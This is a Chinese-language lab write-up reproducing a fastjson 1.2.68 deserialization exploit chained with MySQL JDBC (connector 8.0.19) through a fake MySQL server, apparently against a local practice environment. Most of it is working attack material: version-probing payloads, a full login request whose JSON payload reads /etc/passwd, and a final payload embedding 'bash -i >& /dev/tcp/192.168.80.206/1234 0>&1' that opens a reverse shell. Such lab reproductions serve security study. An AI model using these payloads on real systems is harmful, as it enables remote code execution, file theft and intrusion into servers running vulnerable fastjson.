fastjson漏洞复现-1268-jdbc

1268-jdbc#

启动环境，访问站点，抓取登陆处的包

Pasted image 20250108144534

删除右括号，报错

Pasted image 20250108144612

报错探测 fastjson 的版本

{
  "@type": "java.lang.AutoCloseable"

版本为 1.2.68

Pasted image 20250108144652

此环境可以配合 Mysql-JDBC 反序列化打 fastjson

参考查找 JDBC 依赖，不同的 mysql 版本依赖不一样：

https://github.com/lemono0/FastJsonParty/blob/main/Fastjson%E5%85%A8%E7%89%88%E6%9C%AC%E6%A3%80%E6%B5%8B%E5%8F%8A%E5%88%A9%E7%94%A8-Poc.md

com.mysql.jdbc.Buffer  //mysql-jdbc-5
com.mysql.cj.api.authentication.AuthenticationProvider  //mysql-connect-6
com.mysql.cj.protocol.AuthenticationProvider //mysql-connect-8

Pasted image 20250108145016

Pasted image 20250108145045

{
  "x": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "com.mysql.cj.protocol.AuthenticationProvider
		}
	}

测试后判断 mysql 的版本为 mysql-connect-8

根据作者 wp 可知 mysql-connect 的版本为 8 下限制条件很大，只有一个版本可用：8.0.19，而恰好这个环境 mysql-connect 的版本是 8.0.19

结合 https://github.com/fnmsd/MySQL_Fake_Server 工具进行利用

启动 mysql fake server

Pasted image 20250108145423

尝试文件读取

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 869
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=ECE08E72ED63A0332C3FE78110ED7511
Connection: close

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "192.168.80.206"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "192.168.80.206",
                "user": "fileread_/etc/passwd",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

可读取文件

Pasted image 20250108145946

使用作者提供的 ysoserial-0.0.6-SNAPSHOT-all.jar，然后上传到和 Mysql-Fake-Server 下，server.py 可以直接读取

Pasted image 20250108151214

最终脚本如下：

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "192.168.80.206"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "192.168.80.206",
                "user": "yso_FastJson1_bash -i >& /dev/tcp/192.168.80.206/1234 0>&1",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

发送 payload

Pasted image 20250108152425

返回 shell

Pasted image 20250108152509